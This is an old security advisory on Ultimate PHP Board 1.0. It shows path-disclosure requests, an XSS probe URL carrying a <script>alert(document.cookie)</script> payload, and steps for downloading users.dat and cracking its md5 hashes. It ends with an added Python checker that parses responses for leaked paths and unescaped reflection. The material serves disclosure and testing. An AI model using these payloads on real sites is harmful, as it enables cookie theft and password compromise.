=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic:         XSS and Path Disclosure in UPB
product:       Ultimate PHP Board (UPB) final beta 1.0
vendor:        http://www.webrc.ca/php/upb.php
risk:          medium
date:          12/7/2k2
discovered by: euronymous /F0KP /HACKRU Team
advisory url:  http://f0kp.iplus.ru/bz/009.txt
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

description
-----------

1) Calling add.php, which ships with UPB, produces an error message
   containing the following information:

================================================================
Warning: Failed opening 'textdb_v2.inc.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/samcom/public_html/public/messageboard2/add.php on line 5
attempting to edit record...
Fatal error: Call to undefined function: format_field() in /home/samcom/public_html/public/messageboard2/add.php on line 11
================================================================

   As you can see, the script output contains the full physical path
   of the board.

2) If the administrator has deleted that file (add.php), you can still
   obtain the full path this way:

==============================================================
http://hostname.com/phorum/viewtopic.php?id=some_shit&t_id=2
==============================================================

   Because the `id' parameter is not validated at all, the value is
   used directly as a file name and the script outputs the following
   error message:

=========================== snip =============================
Warning: Unable to access ./data_dir/some_shit.dat in /home/samcom/public_html/public/messageboard2/textdb.inc.php on line 240
..
Warning: Supplied argument is not a valid File-Handle resource in /home/samcom/public_html/public/messageboard2/textdb.inc.php on line 241
..
=========================== snip =============================

   where `data_dir' is the name of the directory in which the board
   stores its important files, e.g. users.dat with the users' passwords
   (md5 hashes). The default name of this directory is `db'.

   If the administrator has not secured this directory (it sits inside
   the web root, so it can simply be requested over HTTP), you can get
   the users' passwords by reading users.dat (the default name; this is
   old stuff) and cracking the md5 hashes.

3) For the same reason (viewtopic.php does not check `id' at all, and
   echoes it back in the warning), you can inject HTML into the script's
   output:

========================================================
http://hostname.com/phorum/viewtopic.php?id=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&t_id=2
========================================================

   [the whole URL goes on a single line]
   The non-URL-encoded string works fine as well.

ps. All of these issues also apply to previous versions of UPB.

shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all Russian security guyz!!
        and kate for she is kewl girl ))
fuck_off: slavomira and other dirty ppl in *.kz

================ im not a lame, not yet a hacker ================
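The following checker is an added example for confirming the three findings above from captured HTTP responses; it is not part of the advisory and not UPB code. It parses PHP warning lines for the disclosed physical path and the data directory name, derives where users.dat would sit on disk and on the web, and classifies whether the `id' value is reflected raw or HTML-escaped. The sample response bodies are constructed from the warning text quoted in the advisory (they are not real captures); the host name http://hostname.com/phorum, the `db' directory name and the users.dat file name are assumptions.

```python
"""Offline checks for the UPB findings described above: full-path disclosure
through PHP warnings, location of the data directory, and unescaped reflection
of the `id' parameter in viewtopic.php.  Added example; not UPB code."""
import html
import re
from urllib.parse import urlencode

# PHP 4-era error format as quoted in the advisory (display_errors on, html_errors off):
#   Warning: <msg> in /abs/path/script.php on line N
PHP_ERROR_RE = re.compile(
    r"(?:Warning|Notice|Fatal error|Parse error):\s*(?P<msg>.*?)\s+in\s+"
    r"(?P<path>/\S+?\.php)\s+on line\s+(?P<line>\d+)"
)
# "Unable to access ./<dir>/<file>" leaks the name of the directory holding the .dat files
DATA_DIR_RE = re.compile(r"Unable to access \./(?P<dir>[^/\s]+)/(?P<file>\S+)")

XSS_PROBE = "<script>alert(document.cookie)</script>"  # the advisory's own payload


def disclosed_paths(body):
    """Absolute script paths leaked by PHP error output in a response body."""
    return sorted({m.group("path") for m in PHP_ERROR_RE.finditer(body)})


def install_dir(paths):
    """Longest common directory of the leaked paths: the board's physical install dir."""
    if not paths:
        return None
    split = [p.split("/")[:-1] for p in paths]
    common = []
    for segs in zip(*split):
        if len(set(segs)) != 1:
            break
        common.append(segs[0])
    return "/".join(common) or "/"


def data_dir(body):
    """Directory name from an 'Unable to access ./<dir>/...' warning, or None."""
    m = DATA_DIR_RE.search(body)
    return m.group("dir") if m else None


def probe_url(base, probe=XSS_PROBE, t_id=2):
    """viewtopic.php request that reflects `probe` through the `id' parameter."""
    return f"{base}/viewtopic.php?" + urlencode({"id": probe, "t_id": t_id})


def reflection(body, probe=XSS_PROBE):
    """'unescaped' if the probe is reflected verbatim (XSS), 'escaped' if only
    its HTML-escaped form appears, 'absent' otherwise."""
    if probe in body:
        return "unescaped"
    if html.escape(probe, quote=True) in body:
        return "escaped"
    return "absent"


def assess(body, base):
    """Summarise the three findings for one captured response."""
    paths = disclosed_paths(body)
    root = install_dir(paths)
    ddir = data_dir(body)
    return {
        "leaked_paths": paths,
        "install_dir": root,
        "data_dir": ddir,
        # physical and web locations to try for users.dat (assumed default file name)
        "users_dat_path": f"{root}/{ddir}/users.dat" if root and ddir else None,
        "users_dat_url": f"{base}/{ddir}/users.dat" if ddir else None,
        "reflection": reflection(body),
    }


# Constructed sample bodies modelled on the advisory's quoted output (not real captures).
VULNERABLE_BODY = (
    "Warning: Unable to access ./db/<script>alert(document.cookie)</script>.dat in "
    "/home/samcom/public_html/public/messageboard2/textdb.inc.php on line 240\n"
    "Warning: Supplied argument is not a valid File-Handle resource in "
    "/home/samcom/public_html/public/messageboard2/textdb.inc.php on line 241\n"
)
# What a fixed board would return: no PHP warnings, parameter HTML-escaped on output.
FIXED_BODY = "Topic not found: &lt;script&gt;alert(document.cookie)&lt;/script&gt;\n"

if __name__ == "__main__":
    base = "http://hostname.com/phorum"  # assumed install URL
    print(probe_url(base))
    for name, body in (("vulnerable", VULNERABLE_BODY), ("fixed", FIXED_BODY)):
        print(name, assess(body, base))
```

Running it against the vulnerable sample yields the install directory, the `db' name, the derived users.dat locations and a verdict of "unescaped"; against the fixed sample no path is recovered and the verdict is "escaped", which is exactly the difference between a board that validates `id', suppresses display_errors and escapes output, and one that does not.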